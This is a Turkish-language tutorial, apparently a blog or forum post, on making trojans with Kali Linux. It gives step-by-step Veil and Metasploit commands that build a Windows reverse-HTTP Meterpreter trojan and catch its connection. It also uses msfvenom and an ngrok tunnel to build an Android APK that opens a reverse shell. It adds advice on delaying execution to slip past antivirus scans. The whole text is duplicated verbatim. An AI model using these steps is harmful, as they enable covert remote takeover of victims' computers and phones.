sızma kalimesinin bir çok anlamı vardır . örnek verek olursak :
web sitelere , bilgisayarlara , telefonlara ağ ' lara ve teklonojik bir çok alete sızılabilir.
bugün bunlardan bazılarını inceleyeceğiz.
örneklerimizde kali linux işletim sistemi kullanılacaktır ve araç olarak kali tools araçları kullanılacaktır.
bir bilgisayara ve tablet telefonlara trojen ile sızılabilir peki ya trojen nedir?
trojen : trojen kelimesi antik troy lardan gelmektedir yani hepimizin çok iyi bildiği truva atından gelmektedir truva atı akhanlılar tarafından yaptırılan truva surlarını geçmek için kullanılan aslında göründüğü kadar masum olmayan bir tahtadan at ' dır bu at gece saatlerinde kalenin önüne bırakılır ve hediye olduğu söylentisi vardır ve at devasa büyüklüktedir. atı askerler şehrin kapılarını açarak içeri alırlar ve akhanlıları yendik bizden korktular düşüncesiyle gece herkes içip sarhoş olur ama atın içinden beklenmedik akhanlılar askerleri çıkar ve şehrin kapılarını açarak akhanlı ordusunı içeri alırlar ve akhanlı ordusu sarhoş troy ordusu kolaylıkça yener ve şehiri ele geçirirler bu hikayenin geldiği yer çanakkele ilimizdir.
peki ya ben bunu neden anlattım hemen özetleyeyim bazı yazılımcılar bu tarihten yola çıkarak bir virüs yapmıştır ve bu virüsün adı trojendir masum bir dosya , müzik , resim vb. gözüken bu virüs aslında truva atı gibi masum olmayan bir visürtür içersinde bir takım zararlı yazılımlarla beraber sistem uzaktaki hackerin eline geçer .
kendi trojenimizi yapalım:
bu trojen basit bir örnek kali tools trojenidir internette yaygın olarak kullanıldığı için sistemlere bu kodlarla zarar veremessiniz örnek amaçlıdır.
apt-get install veil
veil
default biçimde yükle ek dostalar copy past yap kurulum tamam.
veil imizi açalım:
update
list
use (kullan)
list
Trojan Oluşturma
use (ilk 14 sonra serbest)
set LHOST (kendi ip'miz)
set LPORT 8080
generate
isim = (testtrojan)
Trojanı Dinleyelim
msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_http
show options
set lhost (kendi ip'miz)
set lport (8080 veya isteğe bağlı)
exploit
kodlar basit ve sırasıyla yazılacak şekilde yazılmıştır veil programıyla yapılmıştır kendi trojenizi iyi bir hacker olduğunuzda python programlama dili ile yapabilirsiniz.
peki android telefonlarda nasıl çalışır ?
ngrok yükleyelim
./ngrok tcp 4242
msfvenom -p android/meterpreter/reverse_ tcp LHOST= 6.tcp.ngrok.io LPORT= 14166 R > / root / ngroktest.apk
service postgresql start
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0
set LPORT 4242
show options
exploit -j -z
android için trojen hazırdır ve kullanımı gayet kolaydır mantık ve esas aynıdır
trojenler nasıl yakalanmadan sistemlere sızabilir
trojen yaparken belirli bir çalışma zamanı verirlir 10 saniye sonra çalış gibi 15 saniye sonra çalış gibi
sebebi neler peki ?
çünkü anti virüs programları maksimum bir dosya yüklendimi 30 saniye test eder ve taramayı durdurur eğer bizim trojen yüklendikten 1 dakika sonra çalışırsa sorunsuz hizmet verebilir
bunlardan korunmanın en iyi yolu bilmediğimiz kaynaklardan bir dosya indirmemektir ve işletim sistemimimizin uyarılarına kulak vermeliyiz ayrıyetten anti virüs programları kullanmalı ve korunmalıyız
sızma yöntemlerinin bir sürü yöntemi vardır web sitelere tabletlere teklonojik aletlerin hepsine sızılabilir tek gereken bir ağ bağlantısı ve uzaktan bağlantı içeren sistemlerin içinde bulunmasıdır ve biz bugün trojen virüsünü konu aldık işledik umarım açıklayıcı bir makale olmuştur anlamadığınız kısımları soru olarak sorabilirsiniz . kendinize çok iyi bakım dostlarım iyi formlar
web sitelere , bilgisayarlara , telefonlara ağ ' lara ve teklonojik bir çok alete sızılabilir.
bugün bunlardan bazılarını inceleyeceğiz.
örneklerimizde kali linux işletim sistemi kullanılacaktır ve araç olarak kali tools araçları kullanılacaktır.
bir bilgisayara ve tablet telefonlara trojen ile sızılabilir peki ya trojen nedir?
trojen : trojen kelimesi antik troy lardan gelmektedir yani hepimizin çok iyi bildiği truva atından gelmektedir truva atı akhanlılar tarafından yaptırılan truva surlarını geçmek için kullanılan aslında göründüğü kadar masum olmayan bir tahtadan at ' dır bu at gece saatlerinde kalenin önüne bırakılır ve hediye olduğu söylentisi vardır ve at devasa büyüklüktedir. atı askerler şehrin kapılarını açarak içeri alırlar ve akhanlıları yendik bizden korktular düşüncesiyle gece herkes içip sarhoş olur ama atın içinden beklenmedik akhanlılar askerleri çıkar ve şehrin kapılarını açarak akhanlı ordusunı içeri alırlar ve akhanlı ordusu sarhoş troy ordusu kolaylıkça yener ve şehiri ele geçirirler bu hikayenin geldiği yer çanakkele ilimizdir.
peki ya ben bunu neden anlattım hemen özetleyeyim bazı yazılımcılar bu tarihten yola çıkarak bir virüs yapmıştır ve bu virüsün adı trojendir masum bir dosya , müzik , resim vb. gözüken bu virüs aslında truva atı gibi masum olmayan bir visürtür içersinde bir takım zararlı yazılımlarla beraber sistem uzaktaki hackerin eline geçer .
kendi trojenimizi yapalım:
bu trojen basit bir örnek kali tools trojenidir internette yaygın olarak kullanıldığı için sistemlere bu kodlarla zarar veremessiniz örnek amaçlıdır.
apt-get install veil
veil
default biçimde yükle ek dostalar copy past yap kurulum tamam.
veil imizi açalım:
update
list
use (kullan)
list
Trojan Oluşturma
use (ilk 14 sonra serbest)
set LHOST (kendi ip'miz)
set LPORT 8080
generate
isim = (testtrojan)
Trojanı Dinleyelim
msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_http
show options
set lhost (kendi ip'miz)
set lport (8080 veya isteğe bağlı)
exploit
kodlar basit ve sırasıyla yazılacak şekilde yazılmıştır veil programıyla yapılmıştır kendi trojenizi iyi bir hacker olduğunuzda python programlama dili ile yapabilirsiniz.
peki android telefonlarda nasıl çalışır ?
ngrok yükleyelim
./ngrok tcp 4242
msfvenom -p android/meterpreter/reverse_ tcp LHOST= 6.tcp.ngrok.io LPORT= 14166 R > / root / ngroktest.apk
service postgresql start
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0
set LPORT 4242
show options
exploit -j -z
android için trojen hazırdır ve kullanımı gayet kolaydır mantık ve esas aynıdır
trojenler nasıl yakalanmadan sistemlere sızabilir
trojen yaparken belirli bir çalışma zamanı verirlir 10 saniye sonra çalış gibi 15 saniye sonra çalış gibi
sebebi neler peki ?
çünkü anti virüs programları maksimum bir dosya yüklendimi 30 saniye test eder ve taramayı durdurur eğer bizim trojen yüklendikten 1 dakika sonra çalışırsa sorunsuz hizmet verebilir
bunlardan korunmanın en iyi yolu bilmediğimiz kaynaklardan bir dosya indirmemektir ve işletim sistemimimizin uyarılarına kulak vermeliyiz ayrıyetten anti virüs programları kullanmalı ve korunmalıyız
sızma yöntemlerinin bir sürü yöntemi vardır web sitelere tabletlere teklonojik aletlerin hepsine sızılabilir tek gereken bir ağ bağlantısı ve uzaktan bağlantı içeren sistemlerin içinde bulunmasıdır ve biz bugün trojen virüsünü konu aldık işledik umarım açıklayıcı bir makale olmuştur anlamadığınız kısımları soru olarak sorabilirsiniz . kendinize çok iyi bakım dostlarım iyi formlar
